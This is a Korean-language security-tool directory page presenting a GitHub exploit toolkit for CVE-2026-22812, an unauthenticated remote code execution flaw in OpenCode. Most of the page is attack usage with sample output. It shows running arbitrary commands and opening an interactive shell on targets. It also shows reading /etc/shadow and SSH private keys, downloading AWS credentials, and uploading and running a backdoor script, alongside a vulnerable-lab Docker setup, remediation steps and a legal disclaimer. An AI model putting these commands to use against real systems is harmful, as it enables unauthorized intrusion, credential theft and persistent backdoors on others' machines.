Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/rohmatariow/cve-2026-22812-exploit
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRemote Access Tool
GitHubrohmatariow/cve-2026-22812-exploit

CVE-2026-22812-exploit

Exploitation toolkit for CVE-2026-22812 (OpenCode 인증 없는 RCE) — 승인된 보안 테스트를 위한 대화형 셸, 임의 명령 실행, 파일 업로드/다운로드 및 시스템 정보 수집 기능을 제공합니다.

저장소 보기
3367개월 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-22812 익스플로잇 도구

Python CVSS

CVE-2026-22812 - OpenCode 인증 없는 RCE를 위한 완전한 기능의 익스플로잇 툴킷


🎯 개요

CVE-2026-22812 익스플로잇 도구는 OpenCode 인증 없는 원격 코드 실행 취약점을 위한 포괄적인 익스플로잇 프레임워크입니다. 이 도구는 대화형 셸, 파일 작업, 시스템 정보 수집을 포함한 여러 익스플로잇 방법을 제공합니다.

취약점 세부 정보

  • CVE ID: CVE-2026-22812
  • 영향 대상: OpenCode < 1.0.216
  • CVSS 점수: 8.8 (높음)
  • 공격 경로: 네트워크
  • 인증: 필요 없음
  • 영향: 완전한 시스템 장악

✨ 기능

🔓 익스플로잇 기능

  • ✅ 인증 없는 세션 생성
  • ✅ 임의 명령 실행 (RCE)
  • ✅ 명령 기록이 있는 대화형 셸
  • ✅ 파일 업로드/다운로드
  • ✅ 임의 파일 읽기
  • ✅ PTY 세션 생성
  • ✅ 시스템 정보 수집
  • ✅ 프록시 지원 (Burp Suite 호환)

  • 📦 설치

    사전 요구 사항

    • Python 3.7+
    • pip
    • requests 라이브러리

    빠른 설치

    root@kitploit:~
    # 저장소 복제
    git clone https://github.com/rohmatariow/CVE-2026-22812-exploit.git
    cd CVE-2026-22812-exploit
    
    # 의존성 설치
    pip3 install -r requirements.txt
    

    수동 설치

    root@kitploit:~
    pip3 install requests urllib3
    

    🚀 사용법

    기본 익스플로잇

    1. 대상이 취약한지 확인

    root@kitploit:~
    python3 exploit.py -t http://192.168.1.10:4096 --verify
    

    출력:

    root@kitploit:~
    [+] 대상이 CVE-2026-22812에 취약합니다!
    [+] 세션 ID: abc123def456
    

    2. 단일 명령 실행

    root@kitploit:~
    python3 exploit.py -t http://192.168.1.10:4096 -c "id"
    

    출력:

    root@kitploit:~
    [*] 세션 생성 중...
    [+] 세션 생성됨: abc123def456
    [+] 대상이 취약합니다!
    
    [*] 실행 중: id
    [+] 명령이 성공적으로 실행되었습니다
    
    uid=1000(developer) gid=1000(developer) groups=1000(developer)
    

    3. 대화형 셸 모드

    root@kitploit:~
    python3 exploit.py -t http://192.168.1.10:4096 -i
    

    대화형 세션:

    root@kitploit:~
    [+] 세션 생성됨: abc123def456
    [+] 대상이 취약합니다!
    
    [*] 대화형 셸 모드 진입
    [!] 명령어 목록은 'help', 종료는 'exit' 입력
    
    developer@target$ whoami
    developer
    
    developer@target$ pwd
    /home/developer/workspace
    
    developer@target$ ls -la
    total 48
    drwxr-xr-x  8 developer developer 4096 Jan 16 10:30 .
    drwxr-xr-x  3 developer developer 4096 Jan 15 09:20 ..
    -rw-r--r--  1 developer developer  220 Jan 15 09:20 .bash_logout
    ...
    
    developer@target$ read /etc/hostname
    [*] 파일 읽는 중: /etc/hostname
    [+] 파일 읽기 성공 (10 bytes)
    dev-server-01
    
    developer@target$ exit
    [*] 종료 중...
    

    📚 상세 사용법

    명령 실행

    root@kitploit:~
    # 단일 명령
    python3 exploit.py -t http://target:4096 -c "whoami"
    
    # 복잡한 명령
    python3 exploit.py -t http://target:4096 -c "ps aux | grep opencode"
    
    # 여러 명령
    python3 exploit.py -t http://target:4096 -c "cd /tmp && ls -la && pwd"
    

    파일 작업

    파일 읽기

    root@kitploit:~
    # 민감한 파일 읽기
    python3 exploit.py -t http://target:4096 -r /etc/passwd
    python3 exploit.py -t http://target:4096 -r /etc/shadow
    python3 exploit.py -t http://target:4096 -r ~/.ssh/id_rsa
    

    파일 업로드

    root@kitploit:~
    # 셸 스크립트 업로드
    python3 exploit.py -t http://target:4096 --upload shell.sh /tmp/shell.sh
    
    # 바이너리 업로드
    python3 exploit.py -t http://target:4096 --upload payload.elf /tmp/payload
    
    # 실행과 함께 업로드
    python3 exploit.py -t http://target:4096 --upload backdoor.sh /tmp/bd.sh
    python3 exploit.py -t http://target:4096 -c "chmod +x /tmp/bd.sh && /tmp/bd.sh"
    

    파일 다운로드

    root@kitploit:~
    # 설정 파일 다운로드
    python3 exploit.py -t http://target:4096 --download /etc/hosts ./hosts.txt
    
    # 자격 증명 다운로드
    python3 exploit.py -t http://target:4096 --download ~/.aws/credentials ./aws_creds.txt
    
    # 소스 코드 다운로드
    python3 exploit.py -t http://target:4096 --download /app/config.json ./config.json
    

    시스템 정보 수집

    root@kitploit:~
    # 시스템 정보 수집
    python3 exploit.py -t http://target:4096 --sysinfo
    

    출력:

    root@kitploit:~
    {
      "hostname": "dev-server-01",
      "username": "developer",
      "user_id": "uid=1000(developer) gid=1000(developer)",
      "current_dir": "/home/developer/workspace",
      "kernel": "Linux dev-server-01 5.15.0-91-generic x86_64",
      "os_release": "Ubuntu 22.04.3 LTS",
      "ip_address": "192.168.1.10",
      "processes": "..."
    }
    

    대응 조치

    1. 즉시 업데이트: npm install -g opencode-ai@latest
    2. 프로세스 종료: pkill -f opencode
    3. 로그 확인: 침해 지표에 대한 시스템 로그 검토
    4. 자격 증명 교체: 비밀번호, SSH 키 변경
    5. 시스템 감사: 백도어 확인

    🧪 테스트 랩 구성

    Docker 사용 (권장)

    root@kitploit:~
    # 취약한 OpenCode용 Dockerfile
    FROM node:18
    RUN npm install -g [email protected]
    EXPOSE 4096
    CMD ["opencode"]
    
    root@kitploit:~
    # 빌드 및 실행
    docker build -t opencode-vuln .
    docker run -p 4096:4096 opencode-vuln
    
    # 익스플로잇 테스트
    python3 exploit.py -t http://localhost:4096 -i
    

    수동 구성

    root@kitploit:~
    # 취약한 버전 설치
    npm install -g [email protected]
    
    # OpenCode 시작
    opencode
    
    # 다른 터미널에서 익스플로잇 실행
    python3 exploit.py -t http://localhost:4096 --verify
    

    ⚠️ 프로덕션 환경에 취약한 버전을 배포하지 마세요!


    📚 참고 자료

    취약점 정보

    • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-22812
    • GitHub Advisory: https://github.com/anomalyco/opencode/security/advisories/GHSA-vxw4-wv6m-9hhh
    • MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22812=

    ⚠️ 법적 고지

    주의 깊게 읽으십시오

    이 도구는 승인된 보안 테스트 전용으로 제공됩니다.

    ❌ 금지된 사용

    • 승인되지 않은 시스템 접근
    • 허가 없는 스캔
    • 모든 불법 활동
    • 악의적인 목적
    • 승인 없는 프로덕션 시스템

    법적 고지

    저자는:

    • 불법 사용을 묵인하지 않습니다
    • 오용에 대해 책임지지 않습니다
    • 불법 활동을 지원하지 않습니다
    • 어떠한 책임도 지지 않습니다

    이 도구를 사용함으로써 귀하는 다음 사항에 동의합니다:

    • 적절한 승인을 받을 것
    • 모든 법률을 준수할 것
    • 전적인 책임을 질 것
    • 윤리적이고 책임감 있게 사용할 것

    사용에 따른 위험은 전적으로 사용자에게 있습니다


    ⭐ 유용하다면 스타를 눌러주세요! ⭐
    승인된 보안 테스트 전용

    도구 다운로드